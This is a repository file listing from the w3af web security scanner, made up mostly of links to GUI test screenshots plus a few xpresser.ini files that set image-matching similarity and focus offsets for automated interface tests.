-------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/200_OK.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/images/200_OK.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/abcdef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/images/abcdef.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/images/error.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/localhost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/images/localhost.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/play.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/images/play.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/response_tab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/images/response_tab.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/send-disabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/fuzzy_request_editor/images/send-disabled.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/fuzzy_request_editor/images/xpresser.ini: -------------------------------------------------------------------------------- 1 | [image play] 2 | filename = play.png 3 | similarity = 0.8 4 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/invalid_target_url/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/invalid_target_url/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/invalid_target_url/images/invalid_url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/invalid_target_url/images/invalid_url.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/invalid_target_url/images/no_audit_grep_plugins.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/invalid_target_url/images/no_audit_grep_plugins.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/audit_plugin_type.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/audit_plugin_type.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/audit_plugin_type_text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/audit_plugin_type_text.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/bug_detected.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/bug_detected.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/clear_icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/clear_icon.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/eval_plugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/eval_plugin.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/exploit_list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/exploit_list.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/exploit_tab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/exploit_tab.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/insert_target_url_here.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/insert_target_url_here.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/log_tab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/log_tab.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/main-window-cross-close.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/main-window-cross-close.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/main-window-menu-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/main-window-menu-2.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/main-window-menu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/main-window-menu.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/main-window-title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/main-window-title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/new_profile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/new_profile.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/ok.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/ok.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/output_plugin_list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/output_plugin_list.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/output_plugin_type_text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/output_plugin_type_text.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/owasp_top_10_profile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/owasp_top_10_profile.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/results_tab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/results_tab.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/scan_not_started.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/scan_not_started.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/scan_start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/scan_start.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/throbber_stopped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/throbber_stopped.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/xpresser.ini: -------------------------------------------------------------------------------- 1 | [image main-window-title] 2 | filename = main-window-title.png 3 | focus_delta = +200 +0 4 | 5 | [image main-window-menu] 6 | filename = main-window-menu.png 7 | similarity = 0.8 8 | 9 | [image scan_start] 10 | filename = scan_start.png 11 | similarity = 0.7 12 | 13 | [image clear_icon] 14 | filename = clear_icon.png 15 | similarity = 0.8 16 | 17 | [image eval_plugin] 18 | filename = eval_plugin.png 19 | focus_delta = -20 +0 20 | 21 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/main_window/images/yes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/main_window/images/yes.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/manual_requests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/manual_requests/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/manual_requests/images/200_OK.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/manual_requests/images/200_OK.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/manual_requests/images/abcdef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/manual_requests/images/abcdef.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/manual_requests/images/localhost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/manual_requests/images/localhost.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/manual_requests/images/send.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/manual_requests/images/send.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/manual_requests/images/send_disabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/manual_requests/images/send_disabled.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/manual_requests/images/stopped_sending_requests.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/manual_requests/images/stopped_sending_requests.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/bold_test_profile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/bold_test_profile.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/context_menu_profile_delete.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/context_menu_profile_delete.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/profile_desc_in_label.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/profile_desc_in_label.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/profile_description.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/profile_description.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/profile_disabled_all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/profile_disabled_all.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/profile_disabled_output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/profile_disabled_output.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/profile_name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/profile_name.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/profile_new_dlg_button.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/profile_new_dlg_button.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/profile_save.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/profile_save.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/scan_config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/scan_config.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/test_profile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/test_profile.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/test_profile_selected.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/new_profile/images/test_profile_selected.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/new_profile/images/xpresser.ini: -------------------------------------------------------------------------------- 1 | [image profile_name] 2 | filename = profile_name.png 3 | focus_delta = +50 +0 4 | 5 | [image profile_description] 6 | filename = profile_description.png 7 | focus_delta = +50 +0 8 | 9 | [image bold_test_profile] 10 | filename = bold_test_profile.png 11 | similarity = 0.8 12 | 13 | [image profile_save] 14 | filename = profile_save.png 15 | similarity = 0.8 16 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/no_plugins_scan/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/no_plugins_scan/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/no_plugins_scan/images/no_plugins.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/no_plugins_scan/images/no_plugins.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/profile_loading/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/profile_loading/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/profile_loading/images/audit_plugins_enabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/profile_loading/images/audit_plugins_enabled.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/profile_loading/images/empty_profile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/profile_loading/images/empty_profile.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/profile_loading/images/no_plugins_enabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/profile_loading/images/no_plugins_enabled.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/profile_loading/images/owasp_top_10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/profile_loading/images/owasp_top_10.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/proxy/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/images/200_OK.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/proxy/images/200_OK.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/images/GET_http.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/proxy/images/GET_http.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/images/empty_intercept.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/proxy/images/empty_intercept.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/images/intercept.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/proxy/images/intercept.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/images/next_request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/proxy/images/next_request.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/images/send-request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/proxy/images/send-request.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/proxy/images/xpersser.ini: -------------------------------------------------------------------------------- 1 | [image intercept] 2 | filename = intercept.png 3 | similarity = 0.8 4 | 5 | [image send-request] 6 | filename = send-request.png 7 | similarity = 0.5 8 | 9 | [image GET_http] 10 | filename = GET_http.png 11 | similarity = 0.8 12 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/request_help/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/request_help/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/request_help/images/configuring_the_scan_fragment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/request_help/images/configuring_the_scan_fragment.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/scan_offline_url/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/scan_offline_url/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/scan_offline_url/images/connection_refused.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/scan_offline_url/images/connection_refused.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/scan_offline_url/images/log_tab_enabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/scan_offline_url/images/log_tab_enabled.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/all-menu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/all-menu.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/close-with-cross.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/close-with-cross.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/compare-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/compare-icon.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/compare-window-title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/compare-window-title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/encode-decode-decode-url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/encode-decode-decode-url.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/encode-decode-encode-url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/encode-decode-encode-url.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/encode-decode-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/encode-decode-icon.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/encode-decode-window-title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/encode-decode-window-title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/export-http-export-html.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/export-http-export-html.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/export-http-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/export-http-icon.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/export-http-window-title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/export-http-window-title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/fuzzy-requests-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/fuzzy-requests-icon.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/fuzzy-requests-tabs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/fuzzy-requests-tabs.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/fuzzy-requests-window-title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/fuzzy-requests-window-title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/manual-request-request-response.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/manual-request-request-response.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/manual-request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/manual-request.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/manual-requests-window-title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/manual-requests-window-title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/proxy-menu-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/proxy-menu-icon.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/proxy-tabs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/proxy-tabs.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/proxy-window-title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/tools_menu/images/proxy-window-title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/xpresser.ini: -------------------------------------------------------------------------------- 1 | [image proxy-menu-icon] 2 | filename = proxy-menu-icon.png 3 | similarity = 0.8 4 | 5 | [image fuzzy-requests-icon] 6 | filename = fuzzy-requests-icon.png 7 | similarity = 0.8 8 | 9 | [image compare-icon] 10 | filename = compare-icon.png 11 | similarity = 0.8 12 | 13 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/tools_menu/images/yes.png: 